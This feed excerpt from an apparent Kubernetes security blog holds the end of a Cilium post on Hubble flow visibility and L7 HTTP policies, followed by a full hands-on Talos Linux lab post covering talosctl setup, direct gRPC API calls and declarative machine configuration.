<p>Then access the Hubble dashboard at:</p>
<pre><code class="lang-bash">http://&lt;control-plane-node-ip&gt;:31080
</code></pre>
<p>That’ll launch the UI dashboard. You’ll start seeing live flow logs:</p>
<ul>
<li><p><strong>FORWARDED</strong> — allowed by policy</p>
</li>
<li><p><strong>DROPPED</strong> — denied by policy</p>
</li>
<li><p>With full context: source → destination, protocol, port, and verdict.</p>
</li>
</ul>
<h3 id="heading-step-3-validate-our-flows">Step 3: Validate Our Flows</h3>
<p>Now generate some traffic from the frontend namespace:</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~/blog$ kubectl -n frontend run <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Tue, 07 Oct 2025 03:25:44 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

test:~# dig +short google.com
142.251.46.238
test:~# nc -vz postgres.db.svc.cluster.local 5432
^C
</code></pre>
<p>Back in Hubble, you’ll see some forwarded and some dropped as expected:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759807764715/402a9985-cdd3-4a48-93bf-88ae6b14845d.png" alt class="image--center mx-auto" /></p>
<p>That’s Cilium showing you every flow in the <code>frontend</code> namespace. The graphics aren’t bad either. Easy as you like it.</p>
<hr />
<h2 id="heading-l7-enforcement">L7 Enforcement</h2>
<p>By now, we’ve seen Cilium handle L3/L4 segmentation cleanly. But the cool kid stuff is <strong>application-aware enforcement</strong>. It can look <em>inside</em> packets to understand requests by method and path. No sidecars, no service mesh, no YAML sorcery. Just a native policy that says: <em>allow</em> <code>GET /healthz</code>, block <code>POST /admin</code>.</p>
<h3 id="heading-why-l7">Why L7?</h3>
<p>With Calico, policies stopped at “TCP 80 from frontend to backend.” With Cilium, we can go further — controlling traffic by HTTP method, path, etc. That bridges the gap between <em>network isolation</em> and <em>API protection.</em></p>
<h3 id="heading-step-1-create-an-l7-aware-policy">Step 1: Create an L7-Aware Policy</h3>
<p>Let's simply update our existing <code>cnp-front-to-back.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">front-egress-to-back</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">backend</span>
            <span class="hljs-attr">"k8s:app":</span> <span class="hljs-string">api</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">rules:</span>
            <span class="hljs-attr">http:</span> [{}]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">back-ingress-from-front</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">fromEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">frontend</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">rules:</span>
            <span class="hljs-attr">http:</span> [{}]
</code></pre>
<p>We've just added the <code>rules</code> section below our ports. Simple. It doesn't change which flows are allowed; it just gives us L7 visibility.</p>
<pre><code class="lang-yaml">          <span class="hljs-attr">rules:</span>
            <span class="hljs-attr">http:</span> [{}]
</code></pre>
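<p>If you later want actual L7 enforcement rather than just visibility, you'd swap the empty match for explicit method and path rules. A hedged sketch (the paths here are illustrative, not from our lab app):</p>
<pre><code class="lang-yaml">          rules:
            http:
              - method: "GET"
                path: "/healthz"   # allow health checks
              - method: "GET"
                path: "/api/.*"    # paths are regular expressions
</code></pre>
<p>Requests that don't match any rule get an HTTP 403 back from the proxy Cilium injects, rather than a TCP-level drop.</p>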
<p>Apply and test traffic from your frontend namespace:</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$  kubectl -n frontend run <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl http://api.backend.svc.cluster.local/
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~# curl http://api.backend.svc.cluster.local/h
&lt;html&gt;
&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;center&gt;&lt;h1&gt;404 Not Found&lt;/h1&gt;&lt;/center&gt;
&lt;hr&gt;&lt;center&gt;nginx/1.27.5&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~#</span>
</code></pre>
<p>The first call should succeed. The second returns a <code>404</code>. So let's look at Hubble (ignore the double frontend).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759815123454/0fb2c320-1864-4e8d-87e2-f5a35ab05c7c.png" alt class="image--center mx-auto" /></p>
<p>L7 policies turn Kubernetes from <em>ports and IPs</em> into <em>users and intent</em>. Instead of treating every HTTP request equally, Cilium gives you relevant context. In our case we just see GET requests with their specific paths, but that's already pretty useful.</p>
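<p>The Hubble CLI can surface the same L7 detail as the UI. A sketch, assuming the <code>hubble</code> CLI is connected to Relay:</p>
<pre><code class="lang-bash"># Show only HTTP-parsed flows, including method, path, and status code
hubble observe --namespace frontend --protocol http
</code></pre>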
<hr />
<h2 id="heading-wrapping-up-cilium">Wrapping Up Cilium</h2>
<p>I've just scratched the surface with Cilium, so I'll revisit it in the future. But the Cilium lab shows what happens when you bring intent and observability into the mix: the CNI understands what's actually being said on the wire. By combining kernel-level eBPF hooks with L7 awareness, you get clarity.</p>
<p>If Calico was about scaling guardrails, Cilium is about seeing and understanding them in real time. You can trace every flow, correlate it to a policy, and confirm that what’s allowed is actually what you meant to allow.</p>
<p>My key takeaways:</p>
<ul>
<li><p>L7 visibility: HTTP and DNS insight without the overhead of a service mesh.</p>
</li>
<li><p>Hubble: observability built-in, not bolted on.</p>
</li>
</ul>
<p>Cilium brings a lot of value.</p>
<hr />
<h2 id="heading-ready-to-forget-networkpolicy">Ready to Forget <code>NetworkPolicy</code></h2>
<p>Three parts, three layers of understanding:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Layer</td><td>Tool</td><td>Scope</td><td>What It Taught Us</td></tr>
</thead>
<tbody>
<tr>
<td>L3/L4</td><td>NetworkPolicy</td><td>Namespace</td><td>Basic segmentation</td></tr>
<tr>
<td>L3–L4+</td><td>Calico</td><td>Cluster</td><td>Global guardrails + visibility</td></tr>
<tr>
<td>L3–L7</td><td>Cilium</td><td>Kernel</td><td>Context-aware enforcement + observability</td></tr>
</tbody>
</table>
</div><p>Kubernetes service boundaries aren’t about walls. NetworkPolicy gave us the foundation. Calico helped us scale it. Cilium made it slightly more intelligent. That's a wrap for now.</p>
]]></content:encoded></item><item><title><![CDATA[Talos Linux: Simplifying Kubernetes with Minimalist OS]]></title><description><![CDATA[There’s a certain chaos to most container hosts — which may excite security vendors, but it’s far from ideal in practice. You start with good intentions: run a few workloads, install some debugging tools, tweak a config or two. Before long, your supp...]]></description><link>https://cloudsecburrito.com/talos-linux-simplifying-kubernetes-with-minimalist-os</link><guid isPermaLink="true">https://cloudsecburrito.com/talos-linux-simplifying-kubernetes-with-minimalist-os</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[talos-linux]]></category><category><![CDATA[immutable]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Tue, 16 Sep 2025 22:47:31 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1758058547305/a73da6d3-ad76-44e1-8367-0ad5144a3822.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>There’s a certain chaos to most container hosts — which may excite security vendors, but it’s far from ideal in practice. You start with good intentions: run a few workloads, install some debugging tools, tweak a config or two. Before long, your supposedly “minimal” server is a mess of who-knows-what — a setup that almost always ends up demolishing your lab. And that’s without even touching on how permissive and exposed most container hosts are by default, lighting up security tests.</p>
<p>Sound familiar? I wrote this exact same intro when I looked at <a target="_blank" href="https://cloudsecburrito.com/immutable-minimal-and-actually-useful-meet-flatcar">Flatcar</a>. Now we’re back with our second contender for a minimal OS: <strong>Talos Linux</strong>.  </p>
<p>Talos isn’t a “Linux with Kubernetes on top” story. It’s an <strong>immutable operating system built solely for Kubernetes</strong>. No shell. No SSH. No <code>apt install</code>. Every change is declarative, version-controlled (or at least it should be), and API-driven. The goal is simple: eliminate snowflake nodes and replace them with a repeatable, locked-down blueprint.  </p>
<p>Yes, you can boot it in a toy lab and have NGINX running in minutes. But the real reason Talos stands out is what it <em>refuses</em> to let you do. By stripping away the usual clutter of a Linux host, Talos pushes Kubernetes operators into a world of zero drift, reproducible state, and a dramatically reduced attack surface.  </p>
<p>This post isn’t about a “hello world” demo (though we’ll include one). It’s about why Talos makes a compelling foundation for a serious Kubernetes security posture.  </p>
<hr />
<h2 id="heading-talos-linux-lab">Talos Linux Lab</h2>
<h3 id="heading-1-prereqs">1. Prereqs</h3>
<ul>
<li><strong>UTM</strong> installed (<a target="_blank" href="https://mac.getutm.app/">https://mac.getutm.app/</a>)  </li>
<li><strong>Homebrew</strong> with <code>talosctl</code> installed:  <pre><code class="lang-bash">brew install siderolabs/tap/talosctl
</code></pre>
</li>
<li><strong>Talos ISO</strong> downloaded:  <ul>
<li><a target="_blank" href="https://github.com/siderolabs/talos/releases/latest">Talos GitHub Releases</a>  </li>
<li>Use <code>metal-arm64.iso</code> for Apple Silicon  </li>
</ul>
</li>
</ul>
<h3 id="heading-2-create-the-vm-in-7-steps">2. Create the VM in 7 Steps</h3>
<ol>
<li>Open <strong>UTM → Create New VM</strong>  </li>
<li>Choose <strong>Virtualize → Linux</strong>  </li>
<li>Linux - Browse to <code>metal-arm64.iso</code></li>
<li>Hardware - Leave default</li>
<li>Storage - Leave default</li>
<li>Shared Directory - Leave default</li>
<li>Name the VM <code>Talos-Controlplane</code>.  </li>
</ol>
<h3 id="heading-3-boot-into-maintenance-mode">3. Boot into Maintenance Mode</h3>
<ul>
<li>Start the VM → Talos boots to <strong>maintenance mode</strong> (no shell, just logs).  </li>
<li>Talos is waiting for you to send a machine config.  </li>
<li>Note the VM’s IP address (you’ll need it for <code>talosctl</code>).  </li>
</ul>
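<p>Before generating configs, you can sanity-check that the node is reachable over the maintenance-mode API. A quick sketch (<code>--insecure</code> is required because no certificates exist yet):</p>
<pre><code class="lang-bash">talosctl version --insecure --nodes &lt;VM_IP&gt;
</code></pre>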
<h3 id="heading-4-generate-a-config">4. Generate a Config</h3>
<p>Start by assigning the IP address to an environment variable. My IP is below:</p>
<pre><code class="lang-bash">`<span class="hljs-built_in">export</span> CONTROL_PLANE_IP=192.168.64.14`
</code></pre>
<p>Then grab the disk name and assign it to a variable. Mine is <code>vda</code>:</p>
<pre><code class="lang-bash">matt.brown@matt Talos % talosctl get disks --insecure --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span>
NODE            NAMESPACE   TYPE   ID      VERSION   SIZE    READ ONLY   TRANSPORT   ROTATIONAL   WWID   MODEL         SERIAL
192.168.64.14   runtime     Disk   loop0   2         66 MB   <span class="hljs-literal">true</span>
192.168.64.14   runtime     Disk   sr0     4         0 B     <span class="hljs-literal">false</span>       usb                             QEMU CD-ROM
192.168.64.14   runtime     Disk   vda     2         69 GB   <span class="hljs-literal">false</span>       virtio      <span class="hljs-literal">true</span>
matt.brown@matt Talos % <span class="hljs-built_in">export</span> DISK_NAME=vda
</code></pre>
<p>Choose any cluster name:</p>
<pre><code class="lang-bash">matt.brown@matt Talos % <span class="hljs-built_in">export</span> CLUSTER_NAME=talos_cluster
</code></pre>
<p>Then run the following to generate your config:</p>
<pre><code class="lang-bash">talosctl gen config <span class="hljs-variable">$CLUSTER_NAME</span> https://<span class="hljs-variable">$CONTROL_PLANE_IP</span>:6443 --install-disk /dev/<span class="hljs-variable">$DISK_NAME</span>
</code></pre>
<p>Now edit <code>controlplane.yaml</code> with your network settings. In my environment, if I didn't set this, DNS failed endlessly after rebooting the control-plane node. <code>eth0</code> should work, and of course your <code>gateway</code> and <code>address</code> will depend on your machine.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
    <span class="hljs-attr">network:</span>
    <span class="hljs-comment"># # `interfaces` is used to define the network interface configuration.</span>
      <span class="hljs-attr">interfaces:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">interface:</span> <span class="hljs-string">eth0</span>
        <span class="hljs-attr">addresses:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-number">192.168</span><span class="hljs-number">.64</span><span class="hljs-number">.14</span><span class="hljs-string">/24</span>
        <span class="hljs-attr">routes:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">network:</span> <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span><span class="hljs-string">/0</span>
          <span class="hljs-attr">gateway:</span> <span class="hljs-number">192.168</span><span class="hljs-number">.64</span><span class="hljs-number">.1</span>
      <span class="hljs-attr">nameservers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-number">1.1</span><span class="hljs-number">.1</span><span class="hljs-number">.1</span>
        <span class="hljs-bullet">-</span> <span class="hljs-number">8.8</span><span class="hljs-number">.8</span><span class="hljs-number">.8</span>
</code></pre>
<h3 id="heading-5-apply-config-and-stuff">5. Apply Config and Stuff</h3>
<p>Now we are ready to apply it. Send the config in insecure mode (first contact):  </p>
<pre><code class="lang-bash">talosctl apply-config --insecure --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span> --file controlplane.yaml
</code></pre>
<p>Talos wipes the disk, installs itself, and reboots into normal mode. Might take a bit of time.</p>
<p>Follow up by adding the endpoint:</p>
<pre><code class="lang-bash">talosctl --talosconfig=./talosconfig config endpoints <span class="hljs-variable">$CONTROL_PLANE_IP</span>
</code></pre>
<p>Then go ahead and fire up <code>etcd</code>.</p>
<pre><code class="lang-bash">talosctl bootstrap --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span> --talosconfig=./talosconfig
</code></pre>
<h3 id="heading-6-bootstrap-kubernetes">6. Bootstrap Kubernetes</h3>
<p>Now we're ready to generate our <code>kubeconfig</code>:</p>
<pre><code class="lang-bash">talosctl kubeconfig alternative-kubeconfig --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span> --talosconfig=./talosconfig
<span class="hljs-built_in">export</span> KUBECONFIG=./alternative-kubeconfig
</code></pre>
<p>Check cluster:  </p>
<pre><code class="lang-bash">matt.brown@matt Talos % kubectl get pods -A
NAMESPACE     NAME                                    READY   STATUS    RESTARTS     AGE
kube-system   coredns-54874b5f94-9d2k9                1/1     Running   0            47h
kube-system   coredns-54874b5f94-zgmzz                1/1     Running   0            47h
kube-system   kube-apiserver-talos-sxp-dta            1/1     Running   0            9h
kube-system   kube-controller-manager-talos-sxp-dta   1/1     Running   3 (9h ago)   9h
kube-system   kube-flannel-64n8t                      1/1     Running   0            47h
kube-system   kube-proxy-67l7n                        1/1     Running   0            47h
kube-system   kube-scheduler-talos-sxp-dta            1/1     Running   4 (9h ago)   9h
</code></pre>
<p>You’ll see <code>coredns</code>, <code>kube-apiserver</code>, <code>kube-flannel</code>, <code>kube-proxy</code>,  and <code>kube-scheduler</code>.  Everything is set, even your CNI.</p>
<h3 id="heading-7-run-workloads">7.  Run Workloads</h3>
<p>Untaint the control plane so it can host Pods:  </p>
<pre><code class="lang-bash">kubectl taint nodes --all node-role.kubernetes.io/control-plane-
</code></pre>
<p>Deploy nginx:  </p>
<pre><code class="lang-bash">kubectl create deployment nginx --image=nginx:stable --replicas=2
kubectl expose deployment nginx --port=80 --<span class="hljs-built_in">type</span>=NodePort
kubectl get svc nginx
</code></pre>
<p>Curl from your Mac:  </p>
<pre><code class="lang-bash">curl http://192.168.64.14:&lt;NodePort&gt;
</code></pre>
<p>Hell yeah. Kubernetes the easy way.</p>
<h3 id="heading-recap">Recap</h3>
<ul>
<li>Boot Talos ISO in UTM → node sits in maintenance.  </li>
<li>Generate &amp; apply machine config → installs Talos.  </li>
<li>Bootstrap → Kubernetes up with Flannel.  </li>
<li>Untaint → run nginx or any workload.  </li>
</ul>
<p>A clean, repeatable, single-node Kubernetes cluster in UTM.</p>
<hr />
<h2 id="heading-a-look-underneath-the-hood-of-talosctl">A look underneath the hood of <code>talosctl</code></h2>
<p>One of the most obvious realizations about Talos is that <strong><code>talosctl</code> is not special</strong>. It’s just a thin CLI wrapper over the <a target="_blank" href="https://www.talos.dev/v1.11/reference/api/">Talos <strong>gRPC API</strong></a>. If you strip away the friendly command names, what’s left is a clean, strongly-typed API exposed by every node on port <code>50000</code>.</p>
<h3 id="heading-the-talos-api-in-a-nutshell">The Talos API in a Nutshell</h3>
<ul>
<li><strong>Transport:</strong> gRPC over HTTP/2  </li>
<li><strong>Auth:</strong> Mutual TLS </li>
<li><strong>Port:</strong> <code>50000/tcp</code> on every node  </li>
<li><strong>Schemas:</strong> Public <code>.proto</code> definitions available at <a target="_blank" href="https://github.com/siderolabs/talos/tree/main/api">siderolabs/talos/api</a>  </li>
</ul>
<p>So the <code>talosconfig</code> file is really just the Talos equivalent of a Kubernetes <code>kubeconfig</code>:</p>
<ul>
<li>Stores your CA, client cert, and key</li>
<li>Defines endpoints and nodes</li>
<li>Lets clients establish trust via mTLS</li>
</ul>
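<p>Structurally it's a small YAML file. A rough sketch of the shape (field nesting can vary slightly by Talos version, and the base64 blobs are elided here):</p>
<pre><code class="lang-yaml">context: talos_cluster
contexts:
  talos_cluster:
    endpoints:
      - 192.168.64.14
    nodes:
      - 192.168.64.14
    ca: LS0tLS1...    # base64-encoded PEM, CA cert
    crt: LS0tLS1...   # base64-encoded PEM, client cert
    key: LS0tLS1...   # base64-encoded PEM, client key
</code></pre>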
<h3 id="heading-why-bother">Why Bother?</h3>
<p>As usual there is not a strong case to be made, but we like to understand the underpinnings of our tooling. Here are some possible ideas:</p>
<ul>
<li><strong>Custom automation:</strong> call Talos directly from Python apps.</li>
<li><strong>Integration:</strong> wire Talos into CI/CD flows without needing to shell out to <code>talosctl</code>.</li>
<li><strong>Observability/UI:</strong> build a dashboard or controller that queries node state (<code>disks</code>, <code>services</code>, <code>time</code>) and does stuff.</li>
</ul>
<h3 id="heading-example-grpcurl">Example: <code>grpcurl</code></h3>
<p>With the certs in your <code>talosconfig</code>, you can hit the API directly. You can install <code>grpcurl</code> and <code>yq</code> via <code>brew</code> if you're on a Mac.</p>
<p>A brief explanation of the script below:</p>
<ul>
<li>Export your Talos node IP as an environment variable.  </li>
<li>Use <code>yq</code> to pull the <strong>CA cert</strong>, <strong>client cert</strong>, and <strong>client key</strong> out of your <code>talosconfig</code> and write them to a local folder.  </li>
<li>Set file permissions so the client key is not world-readable.  </li>
<li>Clone the Talos repo to grab the compiled <code>.proto</code> definitions (or use the included <code>api/lock.binpb</code>).  </li>
<li>Run <code>grpcurl</code> with your certs and keys against port <code>50000</code> on the Talos node to query the gRPC API (e.g., <code>machine.MachineService.DiskStats</code>).  </li>
</ul>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> TALOS_NODE=192.168.64.14

CONF=./talosconfig
CTX=talos_cluster
OUT=./talos-certs-2

mkdir -p <span class="hljs-string">"<span class="hljs-variable">$OUT</span>"</span>

<span class="hljs-comment"># CA cert</span>
yq -r <span class="hljs-string">".contexts[\"<span class="hljs-variable">$CTX</span>\"].ca.crt // .contexts[\"<span class="hljs-variable">$CTX</span>\"].ca"</span> <span class="hljs-string">"<span class="hljs-variable">$CONF</span>"</span> | base64 -d &gt; <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/ca.crt"</span>

<span class="hljs-comment"># Client cert</span>
yq -r <span class="hljs-string">".contexts[\"<span class="hljs-variable">$CTX</span>\"].client.crt // .contexts[\"<span class="hljs-variable">$CTX</span>\"].crt"</span> <span class="hljs-string">"<span class="hljs-variable">$CONF</span>"</span> | base64 -d &gt; <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.crt"</span>

<span class="hljs-comment"># Client key</span>
yq -r <span class="hljs-string">".contexts[\"<span class="hljs-variable">$CTX</span>\"].client.key // .contexts[\"<span class="hljs-variable">$CTX</span>\"].key"</span> <span class="hljs-string">"<span class="hljs-variable">$CONF</span>"</span> | base64 -d &gt; <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.key"</span>

chmod 644 <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/ca.crt"</span> <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.crt"</span>
chmod 600 <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.key"</span>

git <span class="hljs-built_in">clone</span> https://github.com/siderolabs/talos.git
<span class="hljs-built_in">cd</span> talos


grpcurl \
  -cacert <span class="hljs-string">"../<span class="hljs-variable">$OUT</span>/ca.crt"</span> \
  -cert   <span class="hljs-string">"../<span class="hljs-variable">$OUT</span>/client.crt"</span> \
  -key    <span class="hljs-string">"../<span class="hljs-variable">$OUT</span>/client.key"</span> \
  -protoset api/lock.binpb \
  <span class="hljs-variable">$TALOS_NODE</span>:50000 machine.MachineService.DiskStats
</code></pre>
<p>You should get something like the following:</p>
<pre><code class="lang-bash">...
        {
          <span class="hljs-string">"name"</span>: <span class="hljs-string">"vda"</span>,
          <span class="hljs-string">"readCompleted"</span>: <span class="hljs-string">"547"</span>,
          <span class="hljs-string">"readSectors"</span>: <span class="hljs-string">"14956"</span>,
          <span class="hljs-string">"readTimeMs"</span>: <span class="hljs-string">"167"</span>,
          <span class="hljs-string">"writeCompleted"</span>: <span class="hljs-string">"2782529"</span>,
          <span class="hljs-string">"writeMerged"</span>: <span class="hljs-string">"57361"</span>,
          <span class="hljs-string">"writeSectors"</span>: <span class="hljs-string">"20539233"</span>,
          <span class="hljs-string">"writeTimeMs"</span>: <span class="hljs-string">"2094027"</span>,
          <span class="hljs-string">"ioTimeMs"</span>: <span class="hljs-string">"1399624"</span>,
          <span class="hljs-string">"ioTimeWeightedMs"</span>: <span class="hljs-string">"2880919"</span>
        },
...
</code></pre>
<p>As we can see, Talos isn’t “locked behind a CLI.” The API is the product, and <code>talosctl</code> is just the stock client. If you want to integrate Talos without the CLI, or write your own admin tooling, you can.</p>
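<p>Since the compiled <code>.proto</code> definitions ship in the repo's protoset, you can also enumerate the API surface offline before calling anything. A sketch, run from the cloned <code>talos</code> directory:</p>
<pre><code class="lang-bash"># List every gRPC service described in the protoset
grpcurl -protoset api/lock.binpb list

# List the methods on a specific service
grpcurl -protoset api/lock.binpb list machine.MachineService
</code></pre>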
<hr />
<h2 id="heading-machine-config-as-code">Machine Config as Code</h2>
<p>Talos is the definition of <strong>immutable</strong>. The <strong>machine config</strong> is the source of truth. Instead of logging into a node and tweaking <code>/etc</code> or running <code>apt install</code>, you declare the <em>entire state of the node</em> in YAML. Talos enforces that state at boot and during runtime. </p>
<h3 id="heading-generating-the-config">Generating the Config</h3>
<p>As we've seen, you don't write Talos configs by hand. Quick recap: they're generated with <code>talosctl</code>:</p>
<pre><code class="lang-bash">talosctl gen config my-cluster https://&lt;CONTROL_PLANE_IP&gt;:6443
</code></pre>
<p>This gives you three files:</p>
<ul>
<li><code>controlplane.yaml</code> — config for Kubernetes control plane nodes.</li>
<li><code>worker.yaml</code> — config for worker nodes.</li>
<li><code>talosconfig</code> — client-side file with API certs and endpoints for <code>talosctl</code>.</li>
</ul>
<h3 id="heading-control-plane-vs-worker">Control Plane vs Worker</h3>
<p>Now we see we get two config files: <code>controlplane.yaml</code> and <code>worker.yaml</code>. The key difference is the <code>machine.type</code> field:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">controlplane</span>   <span class="hljs-comment"># or "worker"</span>
</code></pre>
<ul>
<li><strong>Control plane nodes</strong> run the Kubernetes API server, scheduler, and controller manager.  </li>
<li><strong>Worker nodes</strong> join the cluster but don’t run control plane components.  </li>
</ul>
<p>Hey, it's just Kubernetes. Of course in a single-node lab you only need <code>controlplane.yaml</code>. In a real cluster you'd apply <code>controlplane.yaml</code> to your control-plane nodes and <code>worker.yaml</code> everywhere else. Simple.</p>
<h3 id="heading-what-lives-in-the-config">What Lives in the Config?</h3>
<p>A Talos machine config is the playbook for a node:</p>
<ul>
<li><strong>Installation details</strong> — which disk to wipe and install onto.</li>
<li><strong>Networking</strong> — DHCP or static IPs, routes, nameservers.</li>
<li><strong>Cluster wiring</strong> — control plane endpoint, certs.</li>
<li><strong>System knobs</strong> — kernel parameters, time servers, logging.</li>
<li><strong>Access control</strong> — API roles defined by certificates.</li>
</ul>
<p>Here is part of the config we generated for our lab <code>controlplane.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">controlplane</span>
  <span class="hljs-attr">install:</span>
    <span class="hljs-attr">disk:</span> <span class="hljs-string">/dev/vda</span>
  <span class="hljs-attr">network:</span>
    <span class="hljs-attr">interfaces:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">interface:</span> <span class="hljs-string">eth0</span>
        <span class="hljs-attr">dhcp:</span> <span class="hljs-literal">true</span>
    <span class="hljs-attr">nameservers:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-number">1.1</span><span class="hljs-number">.1</span><span class="hljs-number">.1</span>
      <span class="hljs-bullet">-</span> <span class="hljs-number">8.8</span><span class="hljs-number">.8</span><span class="hljs-number">.8</span>
<span class="hljs-attr">cluster:</span>
  <span class="hljs-attr">controlPlane:</span>
    <span class="hljs-attr">endpoint:</span> <span class="hljs-string">https://192.168.64.14:6443</span>
</code></pre>
<h3 id="heading-declarative-changes">Declarative Changes</h3>
<p>You don’t SSH in and patch things. You:</p>
<ol>
<li>Update the YAML.</li>
<li>Re-apply it with <code>talosctl</code>.</li>
</ol>
<pre><code class="lang-bash">talosctl apply-config -n &lt;NODE_IP&gt; -f controlplane.yaml
</code></pre>
<p>The node reconciles itself against the new config, rebooting if necessary.</p>
<h3 id="heading-patching-vs-full-reapply">Patching vs Full Reapply</h3>
<p>For small tweaks, you don’t need to resend the whole config. Talos supports <strong>merge patches</strong>, much like Kubernetes:</p>
<pre><code class="lang-bash">talosctl apply-patch -n &lt;NODE_IP&gt; --patch @patch.yaml
</code></pre>
<p>Example patch (changing DNS):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
  <span class="hljs-attr">network:</span>
    <span class="hljs-attr">nameservers:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-number">9.9</span><span class="hljs-number">.9</span><span class="hljs-number">.9</span>
</code></pre>
<p>This updates just the <code>nameservers</code> field without touching the rest.</p>
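<p>To confirm a patch actually landed, you can read state back through the same API instead of trusting your local YAML. A sketch (resource names can vary across Talos versions):</p>
<pre><code class="lang-bash"># Show the DNS resolvers the node is actually using
talosctl -n &lt;NODE_IP&gt; get resolvers

# Dump the full live machine config
talosctl -n &lt;NODE_IP&gt; get machineconfig -o yaml
</code></pre>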
<h3 id="heading-drift-becomes-a-non-feature">Drift Becomes a Non-Feature</h3>
<p>With Talos, drift just… doesn’t exist. Nodes either match the declared config or they don’t boot properly. Consistency is the only way. The config is the <strong>authoritative spec for your node</strong>, API-enforced at runtime. Bam.</p>
<hr />
